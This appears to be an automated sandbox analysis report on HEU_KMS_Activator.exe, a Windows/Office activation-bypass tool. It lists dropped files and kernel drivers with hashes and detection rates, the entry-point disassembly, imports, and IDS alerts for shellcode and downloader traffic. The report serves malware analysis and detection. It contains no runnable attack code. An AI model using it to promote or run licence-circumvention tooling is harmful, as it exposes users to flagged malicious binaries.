Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./eb*k..yk..yk..y.s.ym..y.r.yh..yk..y...y.r.ye..y.r.yn..y.s.yj..y.s.yj..y.s.yh..y.s.yj..yRichk..y................PE..d...%..N.........."..........4......H..........@.........................................`..................................................K..d............p..................$...p2...............................................0..8....K..`....................text............................... ..`.rdata..."...0...$... ..............@..@.data........`.......D..............@....pdata.......p.......J..............@..@.reloc...............L..............@..B........................................................................................................................................................................................................................................................................................................

C:\Windows\_temp07242019502489\x64\msvcr100.dll

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):829264
Entropy (8bit):6.55381739669424
Encrypted:false
SSDEEP:12288:3gzGPEett9Mw9HfBCddjMb2NQVmTW752fmyyKWeHQGokozS:QzJetPMw9HfBCrMb2Kc6ymyyKWewGzUS
MD5:DF3CA8D16BDED6A54977B30E66864D33
SHA1:B7B9349B33230C5B80886F5C1F0A42848661C883
SHA-256:1D1A1AE540BA132F998D60D3622F0297B6E86AE399332C3B47462D7C0F560A36
SHA-512:951B2F67C2F2EF1CFCD4B43BD3EE0E486CDBA7D04B4EA7259DF0E4B3112E360AEFB8DCD058BECCCACD99ACA7F56D4F9BD211075BD16B28C2661D562E50B423F0
Malicious:false
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........pm...>...>...>..>...>...>F..>...>...>...>..>...>..>...>D..>...>...>...>...>...>...>Rich...>........................PE..d...J._M.........." ..........................sy............................. ............@.........................................pt.......`..(...............pb......P............................................................................................text...F........................... ..`.rdata..............................@..@.data...L}... ...R..................@....pdata..pb.......d...Z..............@..@_CONST..............................@...text.....2... ...4..................@.. data.........`......................@..@.rsrc................v..............@..@.reloc...............z..............@..B................................................................................................................................

C:\Windows\_temp07242019502489\x86\SECOPatcher.dll

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5632
Entropy (8bit):4.264726183608833
Encrypted:false
SSDEEP:48:S59peUoC03vzDgEMiaWxOj+t5hOl/kTlh3RyZbbR0iPhNh26hYEvYZ18BtaQKzrS:G96ChFCOj2h3nuPhyZyKrHX8t
MD5:E0F0683BB8CFD4413ECCD777034E6A20
SHA1:620DFE7713B9464041846FA9C7B4385F04B15F92
SHA-256:31CFC14E37DF7DECE15E696966AF362098BF04D6CFFFAE780412D98CC90EADD4
SHA-512:A47C8CD4BB6A8C0890373EE012EDC386BE19F7B3F037BE43EF713B3FBD1EF0D25D7B1C399EB28C50601599FBF0EBEAB390E874BC14261C4049498CB7097C90D9
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 33%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................&'i.....................................Rich...................PE..L...U.y[.........."!......................... ...............................P............@.........................0"..d....#..<............................@.......!..T............................................ ...............................text...*........................... ..`.rdata....... ......................@..@.data... ....0......................@....reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\_temp07242019502489\x86\SetACL.exe

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):454056
Entropy (8bit):6.343666374450724
Encrypted:false
SSDEEP:12288:MqyRLu5aCWoevfZ1PUxHmA7PGbdOv4c54e08MGHb:M3GeAxHmA7PGsvF54e08MG7
MD5:451AE03D3C92777F09840CA56F08AB62
SHA1:328D049DA1814CFE7D1C7783691304577854482F
SHA-256:D5E779D151772504662E8226EB4107330FFA7A51209EEE42B6D5883D99100BA9
SHA-512:76772983A5C9C8C703B5E51F8CA9A0D5594121E42AFA12ADCD2B05753A1F96F97B274CDA9B13251E0DCA0D31AE6A719B2C509AC581BB34C930CCB00141EB9D42
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9YU.}8;.}8;.}8;.t@..|8;..N..y8;.f...g8;.f...G8;.f....8;.t@..h8;.}8:.8;.f...k8;.f...|8;.}8..|8;.f...|8;.Rich}8;.........................PE..L....LNP.............................l....... ....@..........................0............@..................................&..........`........................;..p#.................................@............ ...............................text............................... ..`.rdata..x.... ......................@..@.data....C...@..."...*..............@....rsrc...`............L..............@..@.reloc..Zt.......v...`..............@..B................................................................................................................................................................................................................................................................................................

C:\Windows\_temp07242019502489\x86\SppExtComObjHook.dll

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32 executable (DLL) (native) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):16384
Entropy (8bit):6.251436025932812
Encrypted:false
SSDEEP:192:wi7qjiqTX19HhSeJf322jBDv6IDP7ftUfoQ0MyElxMfMZ4qBxfPbI+Cb5L5ng:pCnJ9HhSeJf322RvRP6FN42xfPL25Fg
MD5:E30B53AEDCB0C17DB66D5B3B3EB9A4BA
SHA1:2D65ACAB9E83B0CAAADEB75424DDAFD2CE8B7851
SHA-256:66FAE80DC13273D3C8FEC2ACB8C0FB1F658D53E34D28CDA4986048B8D1DEA8F2
SHA-512:9E00A3B1B3656891E46B1D48D04A431C3CD10711D57C065D9EE7D3CEA10C139C29B0349666DCB8B2877BCF77E338D22124D699782635994C31B41658FC2F0964
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 13%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....W.\...........#.....&...................@.....l.........................p......6.....@... ..............................P..u............................`.......................................................P..h............................text...T$.......&.................. .P`.data........@.......*..............@.`..idata..u....P.......8..............@.0..reloc.......`.......<..............@.0B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\_temp07242019502489\x86\cleanospp.exe

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):17408
Entropy (8bit):5.305506970166326
Encrypted:false
SSDEEP:192:Xdaz2FKIaphXuVX3uKny+gASTGWyQG0eJIL+uVl9tUDY5Kajjtl9w++zOzrPwaur:NbFuUOvAiG0gIVDKDYgmh02HPwzi3An
MD5:5FD363D52D04AC200CD24F3BCC903200
SHA1:39ED8659E7CA16AACCB86DEF94CE6CEC4C847DD6
SHA-256:3FDEFE2AD092A9A7FE0EDF0AC4DC2DE7E5B9CE6A0804F6511C06564194966CF9
SHA-512:F8EA73B0CB0A90FAC6032A54028C60119022173334E68DB3FBD63FE173032DD3FC3B438678064EDB8C63D4ECEAA72990CE039819DF3D547D7D7627AD2EEE36B3
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t.N0...0...0..._.R.3.....@.6...+.e.3...0...v...+.g.1...+.S.?...+.R.2.....E.2.....D.3.....C.1...Rich0...................PE..L...6..N.................6.........../.......P....@..........................p......".....@..................................>..d............................`..l...@................................%..@............... ....=..`....................text....4.......6.................. ..`.data........P.......:..............@....reloc.......`.......>..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\_temp07242019502489\x86\msvcr100.dll

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):773968
Entropy (8bit):6.901569696995594
Encrypted:false
SSDEEP:12288:yMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BV0eAI:dmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV4I
MD5:BF38660A9125935658CFA3E53FDC7D65
SHA1:0B51FB415EC89848F339F8989D323BEA722BFD70
SHA-256:60C06E0FA4449314DA3A0A87C1A9D9577DF99226F943637E06F61188E5862EFA
SHA-512:25F521FFE25A950D0F1A4DE63B04CB62E2A3B0E72E7405799586913208BF8F8FA52AA34E96A9CC6EE47AFCD41870F3AA0CD8289C53461D1B6E792D19B750C9A1
Malicious:false
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L..."._M.........."!.........................0.....x................................u.....@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\splashlogo.gif

Download File
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:GIF image data, version 89a, 273 x 273
Category:dropped
Size (bytes):97281
Entropy (8bit):7.82329967382233
Encrypted:false
SSDEEP:1536:O1l8tBhsJe/wPTWxjzm70L/QulTl4UmSjbDXf9bgr5Dm:Ov8uYGT4jqC/5diuXDX165q
MD5:95CCF61C6AB8C98CD9C6F33AB8D4108F
SHA1:4CDA9E213DA3B4D8C87D3C4FCE103544E0FBCD6A
SHA-256:E91A4F80813094EF53A0408D91679E7757E4F71C4ACC9E942E8ACA630BE0DF45
SHA-512:62851F1C1EC3DB6F3382E5C376B8C69C05EA223983A4929E676A5524767465DE42EE75D3E78730750DFE8E231E937CCFA4242A937D14012B581F2F6EE5353370
Malicious:false
Preview:GIF89a.......ua.......{i.`HvlV....xf...........q..............................wd......yf..........p[......~l....~|.............jT~..........n.hR}_GugQ|............~.........................................ta.......................bKx..........nY..........dMy.......{.........|.fO{bJw...eNz.......y.r]......................gP{....................t..........s.....................t.......................|i....yg.....q..........................................oZ...............us....q\.....}............s_........n............................w........xd.........................y.............q.......zg........cLx.................................................................~k....{..r.........om.pn........................^Ft...!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="ht

C:\Windows\system32\drivers\CbDServices.sys (copy)

Download File
Process:C:\Windows\System32\drivers\DvLayout.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Category:dropped
Size (bytes):54224
Entropy (8bit):6.160827902341627
Encrypted:false
SSDEEP:768:865Pg3db7gc9a28CXCgWmOnyX7AO7MCzsrDX8Ztqo8MoUSnS92OgZxSm:82ItbBMK9MOv5ZtawrS
MD5:26153A4FAA0B3573E4BD461C008059FB
SHA1:8B74A646C4300E257E5FDE076C7E3067CD090D60
SHA-256:D48727E1C1550937470D32022762B924DD945457C7CE8962F65B5DE77D3180CA
SHA-512:2104D0580F2E65F7F3D1657702D8B530685FC05121F28297147E04F6FA2025E273C4AC6FB0774160489EB963675A444FC487D4C029325A1C29BD52F89D4DC7B8
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 50%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.BZx.,.x.,.x.,.q...{.,.q...z.,.#./.|.,.#.(.k.,.#.)...,.#.-.}.,.x.-.=.,..(...,....y.,.Richx.,.................PE..d....nXT.........."..........N.................@.............................0......^.....`A................................................d...P............................ ..X.......8...........................................................................text...V........................... ..h.rdata..............................@..H.data...\4..........................@....pdata..............................@..HINIT....8........................... ..b.reloc..X.... ......................@..B................................................................................................................................................................................................................................................................

C:\Windows\system32\drivers\mvtnom.sys (copy)

Download File
Process:C:\Windows\System32\drivers\DvLayout.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Category:dropped
Size (bytes):52176
Entropy (8bit):6.168313221432706
Encrypted:false
SSDEEP:768:kzVadQ7HTk82VE9KRzr9pyOe4ExHtq6Cbf2Q+IRNJ4Z4:kOQ7zvgEHoUqNJ42
MD5:5C2BC53BF68894CD591C5C7D1E690F41
SHA1:C4DDF1F1582D708BE83B8E75CA889F78ED387055
SHA-256:F0BBE441E1C2B926CB215699690D67526E4220534703A7FC4BB9BB20479F2CC2
SHA-512:EA922918C127ABC170EAACF2429483F2300952B3124328375E48DB524625B29741738A9250DCE8DF2D889148F5E04FB73CD3ACECB9FFD5DFD44CC8531218507B
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 88%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z..p>..#>..#>..#7.7#=..#7.,#<..#e.."9..#e.."$..#e.."8..#e..";..#>..#y..#..."8..#..@#?..#..."?..#Rich>..#........................PE..d....0.T.........."......n.....................@.............................P.......o......................................................d ..P....0..........8............@..D...0t..8...........................pt...............p.. ............................text...<_.......`.................. ..h.rdata..L....p.......d..............@..H.data....s.......*...t..............@....pdata..8...........................@..HPAGE................................ ..`INIT......... ...................... ..b.rsrc........0......................@..B.reloc..D....@......................@..B................................................................................................................................................................

\Device\ConDrv

Download File
Process:C:\Windows\_temp07242019502489\7Z.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1398
Entropy (8bit):5.1625187395570125
Encrypted:false
SSDEEP:24:p5gXZWZiTgUw5dZ2ee074cCLkO6DJHASwr466PI5N3I:LioS1G74JLkDVASM5o
MD5:4CFAC5BF1E88341D802A3219640F8408
SHA1:17E79B402C9638636DEAC1934001CFA0502BE29F
SHA-256:F5084C5896C052BF77E0E4FBF84225F13295659E349AB1E9D17A11063E05E2A3
SHA-512:1D274049954C188873A8AC476ADF32E18C6A46C2168C2E0F210D39190E74A2CB740FA87B98716535408A8455ACC3C090CF6972A43C7F714F73D361D2503B097F
Malicious:false
Preview:..7-Zip (A) 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18....Processing archive: C:\Windows\_temp07242019502489\KMSmini.7z....Extracting Office2010OSPP..Extracting OtherOfficeOSPP..Extracting pic..Extracting x64..Extracting x86..Extracting pic\ewm_wx.jpg..Extracting pic\ewm_zfb.jpg..Extracting pic\head.jpg..Extracting pic\left.jpg..Extracting pic\office.jpg..Extracting pic\shuoming.jpg..Extracting pic\Windows.jpg..Extracting pic\backup.bmp..Extracting pic\restore.bmp..Extracting pic\amt.ico..Extracting pic\ver.ico..Extracting pic\zanzhu.ico..Extracting HEU_KMS_Renewal.xml..Extracting Office2010OSPP\SLERROR.XML..Extracting OtherOfficeOSPP\slerror.xml..Extracting SvcTrigger.xml..Extracting Office2010OSPP\OSPP.VBS..Extracting OtherOfficeOSPP\OSPP.VBS..Extracting HEU_Configuration.ini..Extracting GetProductKey.data..Extracting SetupComplete.data..Extracting x86\cleanospp.exe..Extracting x64\cleanospp.exe..Extracting kms-client.exe..Extracting kms-serve

\Device\Null

Download File
Process:C:\Windows\SysWOW64\PING.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):380
Entropy (8bit):4.937448817509359
Encrypted:false
SSDEEP:6:PzLSLzMRfmWxHLThx2LThx2LThx0sW26wGv+wAFeMmvVOIHJFxMVlmJHaVFEG1vv:PKMRJpTeTeT0sKvtAFSkIrxMVlmJHaVz
MD5:63A3D026F6E4381585F5AEFACE172263
SHA1:3EA8FDD98AA9F20167008F57DAA6F8ED3ECA9738
SHA-256:4C31393CE8AE5EA969A049B3FF5DD0EA18E6C29E0E59841BEC1D7AFB7C64DE4C
SHA-512:FB88787000A6D258A1E3AAB97C46B8D92E68071B8E55C8F98278CB474AE6AFB31256A58BF198132D251F8EC666F28C085A88A103C8DB029B3B188F77163BE793
Malicious:false
Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
Entropy (8bit):7.993629864125517
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:HEU_KMS_Activator.exe
File size:5'596'080 bytes
MD5:28c6bc044e78763a789638242f708f9e
SHA1:d6670c2e2d8646b6ea5acc292bfcb5c6f4f14cd2
SHA256:d9c9cbc0fccd8f456e76d55b3be079b4f062272e2777f02d7438de4310357e36
SHA512:c13d8d828af2abc565d948e0c1a53abbbb59e9f287f0b10594cc2220d6de5c3c470f135607f376af19af3eddbc989682ac4fd235bca8c5b315ce7678d6f3641d
SSDEEP:98304:bdla5HdWHBZayoEsPYIqWUBeKLomp5LvJ1Rk2GtUGJnEGFyP+u09cJhUy:bdWdCZaZPYhWUBeKLXpdte8WiJhUy
TLSH:4B461180B401C77FF4D22FF0ADD83D914AF97EA01E990210A2296F2EB4E72757DE8595
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e.J..n...n...n.E.1...n.E.3...n...o...n.......n.......n.......n.Rich..n.........PE..L...r..T.................b....... ...7.....

File Icon

Icon Hash:b2b2b2b2a2b2a2b0

Static PE Info

General

Entrypoint:0x403783
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x54A61472 [Fri Jan 2 03:45:54 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:17ae050e88c8032ac67ecaa16e8b6361

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00408A00h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebx
call dword ptr [00408288h]
push 00000008h
mov dword ptr [004488D8h], eax
call 00007F962CAC13C5h
push ebx
push 00000160h
mov dword ptr [004487E0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebx
push 00408A93h
call dword ptr [00408158h]
push 00408A88h
push 004447E0h
call 00007F962CAC1105h
call dword ptr [004080B0h]
push eax
mov edi, 00471000h
push edi
call 00007F962CAC10F3h
push ebx
call dword ptr [0040810Ch]
cmp byte ptr [00471000h], 00000022h
mov dword ptr [004487E8h], eax
mov eax, edi
jne 00007F962CABEC3Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00471001h
push dword ptr [esp+14h]
push eax
call 00007F962CAC0E66h
push eax
call dword ptr [00408228h]
mov dword ptr [esp+1Ch], eax
jmp 00007F962CABEC95h
cmp cl, 00000020h
jne 00007F962CABEC38h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F962CABEC2Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:
  • [ C ] VS2005 build 50727
  • [RES] VS2005 build 50727
  • [LNK] VS2005 build 50727

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x8ebc0xb4.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x8f0000x137f8.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x80000x298.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x61fc0x620023ca7817859f8050e8f75236183e7de8False0.6703204719387755data6.488858822196296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata0x80000x1cec0x1e00c3a1d271092e8086c1565dfde839ab8aFalse0.42864583333333334data5.34212204300615IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0xa0000x3e8dc0x200b37070216945156d234628d13558e720False0.1953125data1.4659748340026204IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata0x490000x460000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc0x8f0000x137f80x138000e4e8513f31f957d181ccfac728c5f1cFalse0.023287259615384616data3.343629560642726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountryZLIB Complexity
RT_ICON0x8f2b00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.007955755353129066
RT_ICON0x9fad80xea8dataEnglishUnited States0.007196162046908316
RT_ICON0xa09800x8a8dataEnglishUnited States0.01128158844765343
RT_ICON0xa12280x568dataEnglishUnited States0.014450867052023121
RT_ICON0xa17900x468dataEnglishUnited States0.015957446808510637
RT_ICON0xa1bf80x2e8dataEnglishUnited States0.020161290322580645
RT_ICON0xa1ee00x128dataEnglishUnited States0.04391891891891892
RT_DIALOG0xa20080x1eedataEnglishUnited States0.3866396761133603
RT_DIALOG0xa21f80xe4dataEnglishUnited States0.6359649122807017
RT_DIALOG0xa22e00xdadataEnglishUnited States0.6376146788990825
RT_GROUP_ICON0xa23c00x68dataEnglishUnited States0.7307692307692307
RT_MANIFEST0xa24280x3cdXML 1.0 document, ASCII text, with very long lines (973), with no line terminatorsEnglishUnited States0.5241521068859198

Imports

DLLImport
KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryA, CreateProcessA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, RemoveDirectoryA, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, SetFilePointer, MulDiv, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcA, IsWindowVisible, LoadBitmapA, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuA, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, CheckDlgButton, DialogBoxParamA, GetClassInfoA, CreateWindowExA, SystemParametersInfoA, RegisterClassA, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, wvsprintfA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, ShowWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, LoadCursorA, SetCursor, GetWindowLongA, GetSysColor, CharNextA, SetWindowPos, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SetForegroundWindow
GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dllSHBrowseForFolderA, SHGetPathFromIDListA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dllRegEnumKeyA, RegOpenKeyExA, RegCloseKey, RegDeleteKeyA, RegDeleteValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumValueA
COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

Suricata IDS Alerts

TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
2024-07-25T02:19:58.844006+0200TCP2840787ETPRO HUNTING Request for config.json49713443192.168.2.7184.28.90.27
2024-07-25T02:19:51.775160+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4969980192.168.2.7103.235.46.96
2024-07-25T02:19:53.037690+0200TCP2012510ET SHELLCODE UTF-8/16 Encoded Shellcode8049699103.235.46.96192.168.2.7
2024-07-25T02:19:53.251253+0200TCP2012510ET SHELLCODE UTF-8/16 Encoded Shellcode8049699103.235.46.96192.168.2.7
2024-07-25T02:19:53.037548+0200TCP2012510ET SHELLCODE UTF-8/16 Encoded Shellcode8049699103.235.46.96192.168.2.7
2024-07-25T02:20:06.787407+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971720.12.23.50192.168.2.7
2024-07-25T02:20:45.968967+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973720.114.59.183192.168.2.7
2024-07-25T02:19:53.034129+0200TCP2012510ET SHELLCODE UTF-8/16 Encoded Shellcode8049699103.235.46.96192.168.2.7
2024-07-25T02:19:53.124191+0200TCP2012510ET SHELLCODE UTF-8/16 Encoded Shellcode8049699103.235.46.96192.168.2.7
2024-07-25T02:19:53.037758+0200TCP2012510ET SHELLCODE UTF-8/16 Encoded Shellcode8049699103.235.46.96192.168.2.7
2024-07-25T02:19:53.124522+0200TCP2012510ET SHELLCODE UTF-8/16 Encoded Shellcode8049699103.235.46.96192.168.2.7

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Jul 25, 2024 02:19:50.479415894 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:50.484323978 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:50.484451056 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:50.484626055 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:50.489912987 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:51.703547955 CEST49702443192.168.2.772.52.179.174
Jul 25, 2024 02:19:51.703622103 CEST4434970272.52.179.174192.168.2.7
Jul 25, 2024 02:19:51.703717947 CEST49702443192.168.2.772.52.179.174
Jul 25, 2024 02:19:51.775079966 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:51.775096893 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:51.775110960 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:51.775125980 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:51.775135994 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:51.775160074 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:51.775242090 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:51.775253057 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:51.775254965 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:51.775408030 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:51.775418997 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:51.775429964 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:51.775481939 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:51.775481939 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:51.775481939 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:51.782552004 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:51.782596111 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:51.782634020 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:51.782665014 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:51.782931089 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:51.782931089 CEST4969980192.168.2.7103.235.46.96
